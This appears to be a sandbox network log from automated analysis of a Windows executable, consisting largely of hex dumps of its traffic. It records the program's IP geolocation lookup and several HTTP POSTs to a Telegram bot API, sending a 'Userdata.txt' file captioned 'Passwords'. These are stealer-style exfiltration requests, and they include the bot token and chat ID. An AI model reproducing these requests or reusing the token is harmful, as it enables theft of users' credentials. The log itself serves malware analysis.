2025-01-10 21:31:32 UTC	4833	IN	Data Raw: b6 c0 83 4e ec fc d8 06 20 06 e6 43 7c ac b9 ee d0 60 ce 27 d9 64 ef 1f 12 7c 4e 23 1e 8a 04 29 1c a5 87 5c fb 6c 19 39 1f 8a c9 2a cb b9 d6 c1 a5 32 97 85 e1 b4 be 41 1c 73 44 62 be f1 1b c1 c6 aa aa 4e 25 e7 29 8f ad a2 14 b3 d7 77 ab 96 1f 4c 2e 67 0d f9 ec e2 75 2f f7 68 b1 9e ce 86 c9 64 a6 f1 9c 5d 15 8c 59 57 5c 2a 90 b7 40 36 51 27 d9 64 77 4d 16 73 50 e7 cb 14 4e 83 29 4a 1a 13 d3 13 09 61 7c a2 12 2b 5d 7a 1f d2 f4 f0 96 e1 c7 31 c1 12 b6 f2 7f 45 4d 63 17 0a 10 cd 66 6a ae 15 22 5e 72 8d fe 3c 28 b5 34 1f c0 dc 4f 91 42 2c 66 2e 08 83 6b 91 2e 8f c3 e3 54 89 e7 22 a9 b9 14 17 d7 2e f9 75 eb c0 c9 b9 07 eb 72 16 18 38 89 ed 39 8d f7 12 de 80 56 fa 4d 24 5f 2a 26 79 db 23 d3 36 3c 41 a7 88 d2 06 c2 33 6e 63 46 bd 87 f6 a9 ab 81 4e 18 93 3b 55 67 Data Ascii: N C\|`'d\|N#)\l92AsDbN%)wL.gu/hd]YW\@6Q'dwMsPN)Ja\|+]z1EMcfj"^r<(4OB,f.k.T".ur89VM$_*&y#6<A3ncFN;Ug
2025-01-10 21:31:32 UTC	1322	IN	Data Raw: 74 5a c4 e3 2e 8a b0 22 a9 b9 63 93 de 55 c3 5d ac c4 cb c8 23 78 72 12 3a ea f7 ff 33 8d f1 64 c4 e9 2b bd 5e 23 4a 2e 4b 97 96 23 d9 23 13 ff 31 88 d8 71 8e 4d 4e 67 46 b9 de 61 a9 ab 98 6d 12 ed ba 55 67 84 73 35 32 10 55 fc d0 11 7d 13 f7 b5 85 fb d8 47 04 39 30 46 64 cd 1f 4e 23 11 22 df 04 8a c2 c8 eb 6b da b8 c7 6b 4f e6 d1 26 d0 d0 88 82 e0 d9 48 63 37 dd 89 da cb d3 50 e2 66 f4 68 07 bd 5e 7f 4c 02 1e a1 cb 64 d1 4a bc 61 f2 b3 23 be e3 23 c9 1e 79 95 05 e2 2f f6 23 de 42 17 25 af 75 f0 68 89 43 53 0c 15 e4 91 af 7d bf c7 16 86 fc 6d 99 5e ad 35 ff 1c 87 32 c9 c7 78 45 d3 14 7c 1d b7 83 76 02 20 86 1c e2 09 71 ae f2 8b 73 58 df b4 48 58 16 a7 ca c7 67 b1 2e bb 80 af 22 a1 fb f2 c0 59 a5 bd 3e c8 34 8a 39 0c 8b dd 24 8a cc da f3 99 5b 50 23 e3 bd Data Ascii: tZ."cU]#xr:3d+^#J.K##1qMNgFamUgs52U}G90FdN#"kkO&Hc7Pfh^LdJa##y/#B%uhCS}m^52xE\|v qsXHXg."Y>49$[P#
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: f2 0d 3d 7f ad 97 91 7f 07 d3 e0 0a ca 98 a7 b7 10 16 bb ba 53 1a 3d 33 ff f9 03 bd 0e 56 c2 cd fb 9c 70 3e 4b 41 e2 d1 3c c6 68 ab ee eb 93 5b 15 24 72 e4 4a 74 be a0 64 91 41 44 27 d3 ee e0 16 7d 0e 4e 31 16 a2 a7 3b 1c af 90 71 61 69 34 a2 c1 5b d7 28 3c 83 dd c8 ca 28 f8 84 eb b4 68 9f d3 56 47 53 be f1 3b d3 d2 aa 82 1e 25 fa 23 28 2d a0 1b b3 d7 77 ab f3 37 46 2e 29 7c af e7 ce 05 39 ce e9 c2 47 c4 90 3d 6e af 79 b2 58 2c 96 7d 41 2e e0 f6 3b 30 94 7e 23 ad 93 64 33 78 d1 75 fb ca 9b 58 83 53 87 b1 0a a1 07 1f 70 0a 6f 91 3f 4e 74 7b 7e 65 f0 92 8f 72 27 bf c6 b6 e3 73 1f e6 75 17 70 0d 62 6d 6a d4 9f 31 49 0c 55 91 01 22 c7 d3 21 87 ac 20 44 2d be 6c 8c 27 9b 04 49 5c 8b ce 91 c0 e0 fa 52 c6 62 66 85 d6 8c ac 44 d2 1e c9 b3 62 0a e5 0e 12 48 98 20 Data Ascii: =S=3Vp>KA<h[$rJtdAD'}N1;qai4[(<(hVGS;%#(-w7F.)\|9G=nyX,}A.;0~#d3xuXSpo?Nt{~er'supbmj1IU"! D-l'I\RbfDbH
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: 47 29 2b d9 0e 96 4e 8e 4c 99 1a e6 bd da 15 14 79 d1 a9 24 9c d4 3f 45 31 1b b8 7d f8 ec 9d 23 37 4b 8d fd d9 e4 4c 33 3a 97 38 80 d7 47 5c 15 7f f2 d9 ac d6 88 3f e6 4a 74 29 55 e0 9b 7a d2 63 29 e2 f6 3f 13 ea 83 47 87 07 6d 35 28 ed eb 64 c0 8e d3 df 2a 5d 6a 28 b8 7e bb 3c 11 41 5b 35 89 f0 05 04 fd 51 28 b5 58 51 08 32 8f 38 a3 8c d4 99 d5 45 25 e2 3a 5d 77 35 41 b6 0d e0 f7 8b b8 19 f8 2c 63 99 d3 e3 ef 5c 20 5a ec a2 2f f3 c1 77 62 32 ab 27 6c 07 b2 9d 08 3d cc 3e 41 3c 34 16 10 9d b1 3e b2 e7 ed 12 be cd b8 c8 39 ba 8f b4 30 47 b9 2c b2 a5 27 b0 f9 38 2f cc ed 89 ce 0a 4b 20 9f d5 21 8f 33 82 4e eb 82 47 15 3e 1d ff 5b 6f 2b 99 a4 b9 0f 4e 34 c6 7f f1 04 62 22 8b 23 14 80 52 75 1c a5 89 67 66 1e fb 36 1f 24 d6 0a d3 83 a3 4a d0 33 e7 ea 18 b4 62 Data Ascii: G)+NLy$?E1}#7KL3:8G\?Jt)Uzc)?Gm5(d*]j(~<A[5Q(XQ28E%:]w5A,c\ Z/wb2'l=>A<4>90G,'8/K !3NG>[o+N4b"#Rugf6$J3b
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: c9 f8 9a bc d5 25 26 d2 f4 69 2a fd 11 07 07 bd a9 e6 f1 d0 1f db db 75 68 cf 68 e9 30 a3 a1 1f b3 0d e3 8a d6 5b 5f 1d cb 71 35 9c dd fa 1f a8 9b ff 8b 8a 6f 9f f7 9a e4 22 5a 40 61 36 3d 07 7e fc 81 40 21 79 33 2c 28 65 dd b6 07 d9 b3 9c f7 04 81 12 0b 1f d0 8b 5d 09 e8 a7 74 47 1d 9a 40 2e 2f 92 56 0c 3e d2 9a 8a d8 69 75 5e 27 73 f6 a2 cb 9b f4 b8 9c a3 b4 f6 61 36 34 b9 b3 ed 08 fc 53 43 a5 d0 86 07 b3 78 05 e1 03 15 a4 6e eb f8 4e d7 26 f7 53 3b 42 ba 0f 75 ab fd f0 a4 03 41 d9 1f 90 53 83 d6 8a 05 ff dc 29 fb 14 73 c8 b7 3a 80 f7 9e 95 54 5a aa 08 99 83 76 22 1b 4c 8b 23 c3 1a 4c 33 31 eb 29 91 d9 3f 08 d3 77 0c 98 f9 0c 9f ef e2 8d e8 61 4c 93 6a 69 d5 61 21 e1 e0 3b 74 95 ea 5c 57 98 18 26 39 f4 fc be c6 5f 4a 90 02 ba 6b 3b a6 7b ac f7 43 86 76 Data Ascii: %&i*uhh0[_q5o"Z@a6=~@!y3,(e]tG@./V>iu^'sa64SCxnN&S;BuAS)s:TZv"L#L31)?waLjia!;t\W&9_Jk;{Cv
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: bb 59 2c a0 c4 d1 46 0e f9 d8 4a 7a 77 88 ee 5c 27 70 2b a9 82 38 f3 4c cb 83 b6 a8 b3 3e 90 12 35 59 76 89 1a 7b 0d 43 46 aa 32 32 10 5e 01 3b 35 3d 9f cb 1b fc f9 17 57 01 7c 10 e3 92 05 9f d3 63 f5 21 06 09 95 6f 67 4a 6f d5 0c 55 da cd ee ff 00 2d 9e c9 89 b5 51 8a d0 71 25 f2 d6 88 25 38 3b c6 1a d3 8e 37 39 10 2b 44 92 df 4c a7 01 75 f2 af 21 22 cf 01 92 9a 67 1a 88 07 84 64 38 a7 b5 36 2b 38 f0 bf 4b b4 05 64 51 96 d1 c8 cd 02 7f 71 68 1c 26 89 9b 78 da fb 0f 5a 1e d6 e3 b8 a8 2d 0e 35 d8 fe 53 3a 03 02 15 0c ac 93 ca e7 e9 b5 d9 a9 b7 62 ca 77 9e 7e a3 ab 04 b1 33 fb d3 d6 5d 4d 14 cc 59 cd b7 fd f0 21 fc 9a f2 88 91 7b 89 80 2a f1 36 39 2b b4 0e e0 01 11 a3 81 32 c9 4a 8f 5c 36 10 37 b3 07 c2 b0 c6 ef 01 81 68 35 cc 51 8b 57 10 f8 48 71 39 e4 e8 Data Ascii: Y,FJzw\'p+8L>5Yv{CF22^;5=W\|c!ogJoU-Qq%%8;79+DLu!"gd86+8KdQqh&xZ-5S:bw~3]MY!{*69+2J\67h5QWHq9
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: cd 39 88 87 27 ae 6a 73 66 43 35 a1 6b 33 5b f5 b9 93 99 e6 3e a7 03 6e 64 36 20 5c d5 61 2d 93 1f 79 e1 d7 b3 a9 9f 09 30 45 ed aa 62 f7 49 a5 4b 58 1c 66 c7 3b 7f 81 51 38 54 05 48 c0 f7 97 b1 27 d7 ae 92 51 af f4 62 cf 30 92 db 24 73 6a 68 f1 98 5d 4a 22 92 2a 95 35 ea 9c bd 5e 7a 41 c0 f9 f5 72 05 c9 f3 1b ea e3 da cf d2 64 51 a2 db f2 a0 f0 6c d6 6c 5d 97 ee 62 cd 50 25 af 16 38 a1 83 1b 27 8c 4f b4 8f 48 13 1b f4 c5 b1 54 e1 cc b4 77 34 0d 89 9a de 6f b3 f4 0b 49 0f 9a 4e 59 03 e1 c9 07 22 ec c9 3a c7 4e b9 27 58 85 5f 43 fb d9 2d 83 14 27 a6 ad b3 bc 9c b3 26 bf 77 56 83 61 de 1c a5 47 aa 38 27 6e f7 0e 3b 33 35 86 b4 69 ae f9 67 32 53 73 10 e5 b0 0d f0 11 64 e2 f1 02 d4 97 6e 60 5f 56 0d e5 ab 25 cd e6 30 17 7a de e6 89 c5 34 4c de 71 0b ad de 99 Data Ascii: 9'jsfC5k3[>nd6 \a-y0EbIKXf;Q8TH'Qb0$sjh]J"*5^zArdQll]bP%8'OHTw4oINY":N'X_C-'&wVaG8'n;35ig2Ssdn`_V%0z4Lq
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: f5 43 7d 2e 3d 13 68 d9 01 c3 de 20 3f e0 fc 4d 6a 27 fa bd 37 31 dd 3e 44 79 70 e8 4d 52 5a fc 55 a9 f9 43 0f cd ac 0e 63 99 dd 33 e6 6d dd ed 7d 34 40 9b b3 95 2f 27 91 fa 23 ae 92 bf 3a d1 95 ed cb f5 ac 74 ec 6d 89 b4 6f f2 6a 76 3d c8 05 5d ad d1 ad 09 ad 64 5c 2c 64 9d e9 e0 9b a0 51 f2 c6 b2 e2 43 66 a3 1f 27 3d f6 04 84 19 de 2f 8d c1 a7 11 50 08 e3 2f 24 b0 e2 bb eb c0 fe f9 e8 e4 6b f2 45 f8 ff 41 e7 ff ca 01 9f 96 20 2e 46 41 f6 e9 0c ab 1f 6e b2 13 d3 db 4e 57 cb 2a 81 8d 1f 86 29 09 4f 40 34 92 61 5c 4e f4 a6 85 de 3b 3f a7 03 34 c3 15 20 2a ee 26 3c 9a 01 8d e0 c2 91 40 95 1f c4 4f f9 98 35 fd 65 b3 65 81 cb 66 cd 2c 76 e6 7c 62 48 0f 29 a6 0d 02 b1 21 f7 b5 f8 82 af f4 4f f8 ea a9 77 32 60 67 58 f7 9e 2f d6 36 83 5d 88 88 f6 9c cb 5e f0 41 Data Ascii: C}.=h ?Mj'71>DypMRZUCc3m}4@/'#:tmojv=]d\,dQCf'=/P/$kEA .FAnNW)O@4a\N;?4 &<@O5eef,v\|bH)!Ow2`gX/6]^A
2025-01-10 21:31:32 UTC	1390	IN	Data Raw: 77 eb 91 bb 0a d9 99 f4 d1 ff e2 a6 f8 b6 87 72 6f be 70 70 e1 53 60 5d cf 02 0f d4 2c cd 2a 9b 79 49 e7 67 36 d1 0d 93 6f 9d 25 79 7b c0 74 0c b6 e1 b4 9d b6 f0 4a fd 3b a3 a2 cb f9 c7 a9 c8 0b 9f 67 34 b7 95 ca fb db 99 e6 3c 3a 36 c4 f3 9a c5 7b e3 6f 89 cd c0 a3 f7 2a bf af 05 73 cc 76 34 ea 23 e9 94 04 f8 de de 17 e9 13 18 87 77 1b b7 ab bb cf dc 1f 88 dc 6e 44 f7 35 0c e8 6e be 8e 54 34 f3 00 6a f8 ef c5 2e ab d2 93 8b 73 8e f7 45 40 1c be a0 75 3f 58 84 d1 7c 27 27 f5 6b 9e 38 15 94 7b d1 1a dd 0c 60 66 db f3 5d 66 01 d8 a4 bb 0e d7 51 40 5d 66 90 83 d2 5a 8c f1 9f e7 5b a4 fc 4a 7d 5c 86 cc 49 52 b6 c5 ef 72 87 6e ad d7 fb 90 27 e1 52 17 b0 ec e5 98 f4 83 8e 09 ff 39 04 4e 43 3a b1 6f f8 79 50 63 c7 2d f7 a9 c0 aa 29 f2 63 2e ba f8 92 99 8f 4a a0 Data Ascii: wroppS`],yIg6o%y{tJ;g4<:6{osv4#wnD5nT4j.sE@u?X\|''k8{`f]fQ@]fZ[J}\IRrn'R9NC:oyPc-)c.J

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.3	49980	104.21.80.1	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:35 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 21:31:35 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:31:35 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1859484 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLntxPHb9%2BGP1Qizb1Urgd2NXZ5jS6fzgt9SzPS54d0WGTRA9FoGgx7ijczFPU8X%2F2Ll7FO9e4AJLVl4j9DA8GZIvscR65mKl1Jke9nSMe5JQ4XmUZ6TX9%2B57ZYZE4u230XvO2uD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fffc65bdfd18c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2072&min_rtt=2066&rtt_var=788&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1378008&cwnd=223&unsent_bytes=0&cid=cab0b8f2fe26b0b8&ts=150&x=0"
2025-01-10 21:31:35 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.3	49981	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:42 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd319443444d0b Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:42 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 39 34 34 33 34 34 34 64 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd319443444d0bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:42 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:42 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:42 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43574,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544702,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.3	49983	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:44 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31aa95a100c4 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 21:31:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 61 39 35 61 31 30 30 63 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31aa95a100c4Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:44 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:44 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43575,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544704,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.3	49986	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:46 UTC	271	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31c0d732686b Host: api.telegram.org Content-Length: 1090
2025-01-10 21:31:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 30 64 37 33 32 36 38 36 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd31c0d732686bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 21:31:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 21:31:46 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 21:31:46 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 34 37 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43576,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736544706,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.3	49988	149.154.167.220	443	8068	C:\Users\user\Desktop\6ZoBPR3isG.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 21:31:47 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31d7081d0af9 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
